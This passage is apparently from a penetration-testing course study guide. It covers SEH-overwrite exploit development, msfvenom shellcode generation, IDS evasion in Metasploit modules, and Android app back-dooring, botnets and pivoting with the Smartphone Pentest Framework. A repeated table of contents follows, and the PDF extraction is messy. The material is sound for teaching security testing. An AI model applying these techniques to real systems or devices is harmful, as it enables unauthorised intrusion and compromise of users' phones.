○ Don't forget to make it little endian for intel architecture
○ > msfvenom -p <some windows payload> -s <however much space> -b
'bad,characters' -f py #Generate shellcode in python format
○ Offsets will be important here. Make sure to appropriately pad where necessary.
xploit Development (Part 12) Public Exploits in Perl

Lesson 12.12: E
Skills Learned From This Lesson: Public Exploits, NOP Sleds, Exploitation using Perl
● Public exploits can be utilized but it will likely be necessary to change any shellcode to
custom created shellcode, tune the EIP, ESI and any other applicable register offsets to



42

apply to the target's platform, and edit any code (e.g. NOP Slide sizes) necessary for the
exploit to function on your target machine.
● NOP Sled/Slide/Ramp - A sequence if NOP (Non-Operator) instructions meant to 'slide'
the CPU's instruction execution flow to its final, desired destination whenever the
program branches to a memory address anywhere in the slide.
Lesson 12.13: E xploit Development (Part 13) Turning a 3Com Exploit into a Metasploit Module
Skills Learned From This Lesson: Module Programming, msftidy.rb, IDS Evasion
● If there are any Metasploit Modules using the same protocol or having a similar attack
vector, it would be worthwhile to use bits of those modules to build your own.
● Specifying the payload space and bad characters in a custom msf module is extremely
important as metasploit will generate the payload.
● Also make sure to customize the Targets and the program's return address for that
platform.
● Any exploit that uses static strings in its payload code becomes easy for an Intrusion
Detection System to pick up on and possibly compromise your activity. It's a good
practice to use random text where possible to avoid this.
● > /usr/share/metasploit-framework/tools/msftidy.rb - A ruby script designed to check a
custom Metasploit Module for correct formatting and other possible issues. This is
essential prior to submission for review by Rapid7 for possible inclusion into the
mainstream of the framework.
Lesson 12.14: E xploit Development (Part 14) Structured Exception Handler Overwrite
Skills Learned From This Lesson: Module Programming, msftidy.rb, IDS Evasion
● Structured Exception Handler (SEH) - A mechanism in Windows that makes use of a
"Linked List" containing a sequence of data records. When an exception takes place on
a Windows machine, the OS will attempt to handle the exception according to the
instructions on the list, going from top to bottom. As this happens, the exception handler
will evaluate if it is appropriate to handle the exception. If not, it will notify windows to
continue down the list.
● When developing an exploit for a program using SEH, since control of the program will
be passed to the SEH when an exception is thrown, it'll be necessary to overwrite the
address in memory where the SEH is located.



43

● The SEH is always 8 bytes long, containing a pointer to the next SEH record and the
ppointer to the exception handler itself. In a program that is vulnerable to SEH
exploitation, the SEH will always exit at ESP+8 after an exception is passed.
● POP POP RET - An instruction sequence essential to creating SEH exploits. This
instruction sequence is written into memory in place of a SEH Handler and used when
an exception is thrown to burn data off the top of the stack, thus moving the target SEH
record towards the top of the stack, allowing the attacker the ability to corrupt and exploit
that place in memory.
● > !mona seh -cpb '\x0\x0a\x0d\x40' - Mona will search for the POP POP RET instructions
in memory while omitting entries with bad characters.
● Safe SEH - Functionality that makes a record of SEH addresses and scans for them
when the program hits an exception. If any of those locations in memory are overwritten
when an exception is passed then the thread will fastfail.
● Short JMP (\xeb)- An OPCode of two bytes, the JMP and the relative '+/-' number of
bytes to the current Instruction Pointer (IP).
● metasm > jmp $+8 - Generates hex for instructions to JMP from the present spot in
memory forward 8 bytes.
● "Finding Bad Characters with Immunity Debugger and Mona.py"
(https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/)
● SEH Exploit Development Methodology
○ > crash the program
○ > Find the offset to SEH with ''!mona pattern_create <length>'
○ > '!mona findmsp' and look for SEH
○ > Verify offset to NSEH
○ > Find POP/POP/RET with !mona seh -cpb <bad chars>
○ > Put it in little-endian
○ > short jump in NSEH over SEH \xeb\x06 + 2 bytes of padding
○ > Create and put shellcode after SEH
○ > Be sure to retain the conditions that cause the program to crash.
Teaching Assistant Extra Credit:

● In addition to the aforementioned debuggers, the NSA developed a reverse engineering
framework named Ghidra that is an easy to use tool to assist in reverse engineering
malware and various binary files. (https://github.com/NationalSecurityAgency/ghidra)



44

Module 13: SPF
PF introduction
Lesson 13.1: S
PF (Part 2) Attach to Smartphone Based Apps

Lesson 13.2: S
Skills Learned From This Lesson: Smartphone Pentest Framework, SPF Prerequisites,
Uploading Applications
● Be sure to set the correct IP Address within the
'Smartphone-Pentest-Framework/frameworkconsole/config' file.
● The MYSQL and Apache services must be running as well.
● SPF can be used to create and upload applications to Android devices.
● Android Debug Bridge (ADB) - A command-line tool that allows a user to communicate
with an android device.
● If direct access to the device is not possible, the application can be uploaded to the
Apache2 Webserver and transmitted via SMS or NFC.
Lesson 13.3: S PF (Part 3) Turning an Android App into an SPF Agent

Skills Learned From This Lesson: APK Back-dooring, Metasploit Integration, Agent Deployment
● SPF can decompile an APK, inject a back-door and recompile the APK. The app will
retain all of its preexisting functionality and provide the back-door to the attacker.
● Android Master Key Vulnerabilities will give the tester the ability to transparently replace
legitimate applications using the keys from the original application.
● Communication with the deployed agent can be done either via SMS or HTTP.
● Metasploit mobile exploits can also be used in conjunction with SPF.
PF (Part 4) Functionality for Agents

Lesson 13.4: S
Skills Learned From This Lesson: Agent Botnets, APK Exfiltration, Reverse-engineering APKs
● SPF can turn a mobile device into a bot and used to send malicious messages to other
devices, possibly adding those to the botnet as well.



45

● An application can also be pulled from a back-doored device for reverse-engineering

and possible Exploitation. Targeting a company's internal application is a worthwhile
target for this functionality.
● When communicating with an agent, SPF is programmed to communicate as a normal
application would with the goal of obfuscating it's malicious activity amongst normal
traffic.
Lesson 13.5: S PF (Part 5) Pentesting Mobile Devices

Skills Learned From This Lesson: Perimeter Bypassing, Pivoting, C Compilation for Android
● Using nmap through an agent could allow an attacker to bypass a companies network
perimeter and do an internal scan from a infiltrated Android Smart-phone. This could
even allow a penetration tester to pivot to other vulnerable devices on the internal
network from the back-doored Smart-phone.
● Smartphone Pentesting Framework can also be leveraged with
msfvenom/metasploit/meterpreter and python scripts to create custom shellcode to
exploit target services on other hosts that would normally be inaccessible as well as on
the Agent itself and other potentially vulnerable mobile devices.
● SPF also comes with a compiler so that C can be compiled to run on the ARM
architecture present in android devices.

● The Smartphone Pentesting Framework has since been depreciated by Dagah
(https://www.shevirah.com/dagah/).
● Another framework for mobile device exploitation, notably iOS, is Frida
(https://github.com/frida/frida).



46

Study Guide: Linux

Uploaded by

Study Guide: Linux

Uploaded by

Lesson 1.1:​ Linux (Part 1)

Lesson 1.2:​ Linux (Part 2)

○ > /opt - contains optional files and programs

Lesson 1.3:​ Linux (Part 3)

Lesson 1.4:​ Linux (Part 4)

● Expressed in integers - |7|6|4|

Lesson 1.4:​ Linux (Part 4)

Teaching Assistant Extra Credit

Lesson 2.1:​ Programming (Part 1) Fundamentals for Pen Testers

Lesson 2.2:​ Programming (Part2) Bash Scripting and If/Then Command

# If the input after ./ping.sh is empty, run the following commands.

Lesson 2.3:​ Programming (Part 3) Network Pings

Lesson 2.4:​ Programming (Part 4) Python for Port Scanning

ip = raw_input("Enter the IP address: ")

Lesson 2.5:​ Programming (Part 5) Basics of the C Language

● 'gcc cprogram.c -o cprogram' to compile.

Teaching Assistant Extra Credit

Lesson 3.1:​ Metasploit (Part 1) Introduction

Lesson 3.2:​ Metasploit (Part 2) Fundamentals

Lesson 3.3:​ Metasploit (Part 2) Operation

Lesson 3.4:​ Metasploit (Part 4) Auxiliary Module

Lesson 3.5:​ ​Metasploit (Part 5) msfcli

Lesson 3.6:​ ​Metasploit (Part 6) msfvenom

● /var/www - Default location where Apache2 WebServer serves files.

Teaching Assistant Extra Credit

Module 4: ​Information Gathering

Lesson 4.1:​ ​Information Gathering Intro (Part 1)

Lesson 4.2:​ ​Information Gathering (Part 2) Domain Name Services

Lesson 4.3:​ ​Information Gathering (Part 2) Targeting Email and Maltego

Lesson 4.4:​ ​Information Gathering (Part 4) recon-ng and Google Operators

Lesson 4.5:​ ​Information Gathering (Part 4) NMAP and PortScanning

Teaching Assistant Extra Credit

Module 5: ​Vulnerability Discovery/Scanning

Lesson 5.1:​ ​Vulnerability Scanning Intro (Part 1)

Lesson 5.2:​ ​Vulnerability Scanning (Part 2) Nessus

Lesson 5.3:​ ​Vulnerability Scanning (Part 3) Nmap Scripting Engine

Lesson 5.4:​ ​Vulnerability Scanning (Part 4) WebApp, XAMPP, WEBDAV, Nikto

Lesson 5.5:​ ​Vulnerability Scanning (Part 5) Directory Transversals

Teaching Assistant Extra Credit

Module 6: ​Traffic Capture

Lesson 6.1:​ ​Traffic Capture Introduction (Part 1)

Lesson 6.3:​ ​Traffic Capture (Part 3) Address Resolution Protocol (ARP)

Lesson 6.4:​ ​Traffic Capture (Part 4) DNS

Lesson 6.5:​ ​Traffic Capture (Part 5) Ettercap

Lesson 6.6:​ ​Traffic Capture (Part 6) SSL Stripping

Teaching Assistant Extra Credit

Lesson 7.1:​ ​Exploitation (Part 1) Direct Exploitation

○ > ExitOnSession - Advanced option, can be set to FALSE to allow multiple

Lesson 7.2:​ ​Exploitation (Part 2) SQL commands

Lesson 7.3:​ ​Exploitation (Part 3) Directory Traversal

Lesson 7.4:​ ​Exploitation (Part 4) Open Source Vulnerability

Lesson 7.5:​ ​Exploitation (Part 5) Using Backdoor to Access an FTP Server

Lesson 7.6:​ ​Exploitation (Part 6) Attaching to an IP Address

Teaching Assistant Extra Credit

Lesson 8.1:​ ​Passwords (Part 1) Password Attacks

● The SAM can be found at \System32\config\SAM

Lesson 8.2:​ ​Passwords (Part 2) Online Password Cracking

Lesson 8.3:​ ​Passwords (Part 3) Offline Password Attacks

Lesson 8.4:​ ​Passwords (Part 4) Using Hashcat

Teaching Assistant Extra Credit

Module 9: ​Advanced Exploitation

Lesson 9.1:​ ​Advanced Exploitation (Part 1) Introduction

Lesson 9.2:​ ​Advanced Exploitation (Part 2) Client Side Attacks

Lesson 9.3:​ ​Advanced Exploitation (Part 3) Exploiting Java

Lesson 9.4:​ ​Advanced Exploitation (Part 4) Social Engineering

(https://github.com/trustedsec/social-engineer-toolkit and included in Kali Linux). Its

Lesson 9.5:​ ​Advanced Exploitation (Part 5) Bypassing Antivirus Software

● An alternative to serving payloads on apache2 web servers is using the

Module 10: ​Post-Exploitation

Lesson 10.1:​ P​ ost-Exploitation (Part 1) File Transfer without an Interactive Shell

● msf > post/multi/recon/local_exploit_suggester - This Module can be used on a

Lesson 10.2:​ (​ Part 2) Using Metasploit

Lesson 10.3:​ (​ Part 3) Pivoting

Lesson 10.4:​ (​ Part 4) Setting up a Domain Controller (Rename to “Domain Controller

NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Teaching Assistant Extra Credit

Lesson 1.1: Linux (Part 1)

Lesson 1.2: Linux (Part 2)

Lesson 1.3: Linux (Part 3)

Lesson 1.4: Linux (Part 4)

Lesson 1.4: Linux (Part 4)

Lesson 2.1: Programming (Part 1) Fundamentals for Pen Testers

Lesson 2.2: Programming (Part2) Bash Scripting and If/Then Command

Lesson 2.3: Programming (Part 3) Network Pings

Lesson 2.4: Programming (Part 4) Python for Port Scanning

Lesson 2.5: Programming (Part 5) Basics of the C Language

Lesson 3.1: Metasploit (Part 1) Introduction

Lesson 3.2: Metasploit (Part 2) Fundamentals

Lesson 3.3: Metasploit (Part 2) Operation

Lesson 3.4: Metasploit (Part 4) Auxiliary Module

Lesson 3.5: Metasploit (Part 5) msfcli

Lesson 3.6: Metasploit (Part 6) msfvenom

Module 4: Information Gathering

Lesson 4.1: Information Gathering Intro (Part 1)

Lesson 4.2: Information Gathering (Part 2) Domain Name Services

Lesson 4.3: Information Gathering (Part 2) Targeting Email and Maltego

Lesson 4.4: Information Gathering (Part 4) recon-ng and Google Operators

Lesson 4.5: Information Gathering (Part 4) NMAP and PortScanning

Module 5: Vulnerability Discovery/Scanning

Lesson 5.1: Vulnerability Scanning Intro (Part 1)

Lesson 5.2: Vulnerability Scanning (Part 2) Nessus

Lesson 5.3: Vulnerability Scanning (Part 3) Nmap Scripting Engine

Lesson 5.4: Vulnerability Scanning (Part 4) WebApp, XAMPP, WEBDAV, Nikto

Lesson 5.5: Vulnerability Scanning (Part 5) Directory Transversals

Module 6: Traffic Capture

Lesson 6.1: Traffic Capture Introduction (Part 1)

Lesson 6.3: Traffic Capture (Part 3) Address Resolution Protocol (ARP)

Lesson 6.4: Traffic Capture (Part 4) DNS

Lesson 6.5: Traffic Capture (Part 5) Ettercap

Lesson 6.6: Traffic Capture (Part 6) SSL Stripping

Lesson 7.1: Exploitation (Part 1) Direct Exploitation

Lesson 7.2: Exploitation (Part 2) SQL commands

Lesson 7.3: Exploitation (Part 3) Directory Traversal

Lesson 7.4: Exploitation (Part 4) Open Source Vulnerability

Lesson 7.5: Exploitation (Part 5) Using Backdoor to Access an FTP Server

Lesson 7.6: Exploitation (Part 6) Attaching to an IP Address

Lesson 8.1: Passwords (Part 1) Password Attacks

Lesson 8.2: Passwords (Part 2) Online Password Cracking

Lesson 8.3: Passwords (Part 3) Offline Password Attacks

Lesson 8.4: Passwords (Part 4) Using Hashcat

Module 9: Advanced Exploitation

Lesson 9.1: Advanced Exploitation (Part 1) Introduction

Lesson 9.2: Advanced Exploitation (Part 2) Client Side Attacks

Lesson 9.3: Advanced Exploitation (Part 3) Exploiting Java

Lesson 9.4: Advanced Exploitation (Part 4) Social Engineering

Lesson 9.5: Advanced Exploitation (Part 5) Bypassing Antivirus Software

Module 10: Post-Exploitation

Lesson 10.1: P ost-Exploitation (Part 1) File Transfer without an Interactive Shell

Lesson 10.2: ( Part 2) Using Metasploit

Lesson 10.3: ( Part 3) Pivoting

Lesson 10.4: ( Part 4) Setting up a Domain Controller (Rename to “Domain Controller

Module 11: WebApps

ebApp Introduction (Part 1) Web App Testing

Lesson 11.2: W ebApp (Part 2) Vulnerable Web Applications

ebApp (Part 3) SQL Injection

ebApp (Part 4) File Inclusion

Lesson 11.5: W ebApp (Part 5) Cross Site Scripting

Module 12: Exploit Development

xploit Development Introduction (Part 1)

Lesson 12.2: E xploit Development (Part 2) A Program in Memory

xploit Development (Part 3) Stack Frame for Function

Lesson 12.4: E xploit Development (Part 4) GNU Compiler

Lesson 12.5: E xploit Development (Part 5) Python

xploit Development (Part 6) Executing Unintended Code

Lesson 12.8: E xploit Development (Part 8) Creating a Cyclic Pattern

xploit Development (Part 9) Verifying Offsets

xploit Development (Part 11) Fuzzing

xploit Development (Part 12) Public Exploits in Perl

Module 13: SPF

PF (Part 2) Attach to Smartphone Based Apps

Lesson 13.3: S PF (Part 3) Turning an Android App into an SPF Agent

PF (Part 4) Functionality for Agents

Lesson 13.5: S PF (Part 5) Pentesting Mobile Devices